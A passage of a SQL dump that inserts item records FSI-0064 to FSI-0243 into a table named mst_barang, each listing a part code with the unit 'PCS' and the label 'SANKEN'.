('FSI-0064', '0', '', 'APH34200-644B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0065', '0', '', 'APH34200-645A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0066', '0', '', 'APH34200-646', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0067', '0', '', 'APH34200-650C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0068', '0', '', 'APH34200-667B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0069', '0', '', 'APH34200-669', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0070', '0', '', 'APH34200-670', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0071', '0', '', 'APH34300-525C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0072', '0', '', 'APH34400-564', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0073', '0', '', 'APH36300-501A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0074', '0', '', 'APH36300-503', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0075', '0', '', 'APH42100-504', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0076', '0', '', 'APH42100-506A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0077', '0', '', 'APH42300-502C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0078', '0', '', 'APH44000-175Bthernsheet', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0079', '0', '', 'APH44000-513A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0080', '0', '', 'APH44000-515/APH44000-515A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0081', '0', '', 'APH44000-551/APH44000-551A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0082', '0', '', 'APH44000-586', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0083', '0', '', 'APH44000-591', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0084', '0', '', 'APH44000-599/APH4000-599A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0085', '0', '', 'APH44000-630C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0086', '0', '', 'APH44000-631D', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0087', '0', '', 'APH44000-635B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0088', '0', '', 'APH44000-636', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0089', '0', '', 'APH44000-637', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0090', '0', '', 'APH44000-637B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0091', '0', '', 'APH44000-638B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0092', '0', '', 'APH44000-651BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0093', '0', '', 'APH44000-652BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0094', '0', '', 'APH44000-682', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0095', '0', '', 'APH44000-688ECOTORIO', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0096', '0', '', 'APH44000-710/APH44000-710A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0097', '0', '', 'APH44000-738', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0098', '0', '', 'APH44000-739', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0099', '0', '', 'APH44000-742-A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0100', '0', '', 'APH44000-746A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0101', '0', '', 'APH44000-751', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0102', '0', '', 'APH44000-754', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0103', '0', '', 'APH44000-759MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0104', '0', '', 'APH44000-759WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0105', '0', '', 'APH44000-760MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0106', '0', '', 'APH44000-760WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0107', '0', '', 'APH44000-761MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0108', '0', '', 'APH44000-737', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0109', '0', '', 'APH44000-773', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0110', '0', '', 'APH44000-780-1', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0111', '0', '', 'APH44000-785', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0112', '0', '', 'APH44000-790-1BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0113', '0', '', 'APH44000-791-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0114', '0', '', 'APH44000-792-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0115', '0', '', 'APH44000-797-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0116', '0', '', 'APH44000-809-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0117', '0', '', 'APH44000-809-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0118', '0', '', 'APH44000-810', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0119', '0', '', 'APH44000-814-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0120', '0', '', 'APH44000-814-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0121', '0', '', 'APH44000-815-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0122', '0', '', 'APH44000-815-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0123', '0', '', 'APH44000-817A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0124', '0', '', 'APH44000-819', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0125', '0', '', 'APH44000-820', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0126', '0', '', 'APH44000-821', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0127', '0', '', 'APH44000-822', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0128', '0', '', 'APH44000-829', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0129', '0', '', 'APH44000-830-3A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0130', '0', '', 'APH44000-831-3A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0131', '0', '', 'APH44000-937', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0132', '0', '', 'APH44000-942-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0133', '0', '', 'APH44000-943-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0134', '0', '', 'APH44000-949-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0135', '0', '', 'APH44000-954-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0136', '0', '', 'APH44000-984BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0137', '0', '', 'APH44000-984WA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0138', '0', '', 'APH44000-988-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0139', '0', '', 'APH44001-511-2B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0140', '0', '', 'APH44001-512-2A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0141', '0', '', 'APH44001-516-2A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0142', '0', '', 'APH44001-517-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0143', '0', '', 'APH44001-521', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0144', '0', '', 'APH44001-528-3A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0145', '0', '', 'APH44001-535', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0146', '0', '', 'APH44001-536', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0147', '0', '', 'APH44001-540', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0148', '0', '', 'APH44001-544-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0149', '0', '', 'APH44001-545-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0150', '0', '', 'APH44001-546-2B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0151', '0', '', 'APH44001-547-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0152', '0', '', 'APH44001-558-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0153', '0', '', 'APH44001-559', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0154', '0', '', 'APH44001-560-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0155', '0', '', 'APH44001-562', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0156', '0', '', 'APH44001-563', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0157', '0', '', 'APH44001-564', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0158', '0', '', 'APH44001-569-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0159', '0', '', 'APH44001-581-2A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0160', '0', '', 'APH44001-585-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0161', '0', '', 'APH44001-586-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0162', '0', '', 'APH44001-590-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0163', '0', '', 'APH44001-590-2 Eksport', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0164', '0', '', 'APH44001-595A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0165', '0', '', 'APH44001-595A Eksport', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0166', '0', '', 'APH44001-597B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0167', '0', '', 'APH44100-511A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0168', '0', '', 'APH44100-588', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0169', '0', '', 'APH44100-604B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0170', '0', '', 'APH44100-632A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0171', '0', '', 'APH44100-638B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0172', '0', '', 'APH44100-656D', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0173', '0', '', 'APH44100-657A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0174', '0', '', 'APH44100-730A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0175', '0', '', 'APH44100-742B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0176', '0', '', 'APH44100-748B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0177', '0', '', 'APH44100-751A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0178', '0', '', 'APH44100-767', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0179', '0', '', 'APH44100-773', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0180', '0', '', 'APH44100-774', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0181', '0', '', 'APH44100-775A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0182', '0', '', 'APH44100-775A eksport', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0183', '0', '', 'APH44100-778A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0184', '0', '', 'APH44100-779C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0185', '0', '', 'APH44200-536A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0186', '0', '', 'APH44200-537A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0187', '0', '', 'APH44200-588A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0188', '0', '', 'APH44200-589', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0189', '0', '', 'APH44200-594', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0190', '0', '', 'APH44200-601B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0191', '0', '', 'APH44200-609', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0192', '0', '', 'APH44200-612', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0193', '0', '', 'APH44200-621', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0194', '0', '', 'APH44200-623', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0195', '0', '', 'APH44200-632A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0196', '0', '', 'APH44200-640', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0197', '0', '', 'APH44200-680', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0198', '0', '', 'APH44200-704', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0199', '0', '', 'APH44200-705', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0200', '0', '', 'APH44200-712', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0201', '0', '', 'APH44300-517/APH44300-517A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0202', '0', '', 'APH44400-599A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0203', '0', '', 'APH44400-603C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0204', '0', '', 'APH44400-607A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0205', '0', '', 'APH44400-610', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0206', '0', '', 'APH44400-616-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0207', '0', '', 'APH44600-507A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0208', '0', '', 'APH46100-547', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0209', '0', '', 'APH46400-540', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0210', '0', '', 'APJ42200-508', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0211', '0', '', 'APJ43400-501B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0212', '0', '', 'HAP33494-927C/D', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0213', '0', '', 'HAP33494-928C/D', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0214', '0', '', 'HAP33495-871A/B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0215', '0', '', 'HAP33495-872A/B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0216', '0', '', 'HAP33497-684A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0217', '0', '', 'HAP33497-685A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0218', '0', '', 'HAP33503-780', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0219', '0', '', 'HAP33503-781', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0220', '0', '', 'HAP33522-828', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0221', '0', '', 'HAP33522-829', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0222', '0', '', 'HAP43962-730-C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0223', '0', '', 'HAP44029-942', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0224', '0', '', 'HAP44029-723', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0225', '0', '', 'OSH-1625-SPL', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0226', '0', '', 'OSH-1640-MP', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0227', '0', '', 'APH44001-503-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0228', '0', '', 'OSH-2428-SPL', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0229', '0', '', 'PC0615-53-PB', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0230', '0', '', 'PC1724B-40-PB/CX47100-144', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0231', '0', '', 'PUE16-25/OSH-1625-MP/OSH-1625-MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0232', '0', '', 'TR2215B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0233', '0', '', 'TR3015B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0234', '0', '', 'TR4515B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0235', '0', '', 'APH34200-673A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0236', '0', '', 'APH44100-782A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0237', '0', '', 'APH44200-669', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0238', '0', '', 'APH44200-740', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0239', '0', '', 'APH44400-623', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0240', '0', '', 'APH46100-570', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0241', '0', '', 'APH44001-605-2 A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0242', '0', '', 'APH44200-738', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0243', '0', '', 'APH44200-739', '', '', '', 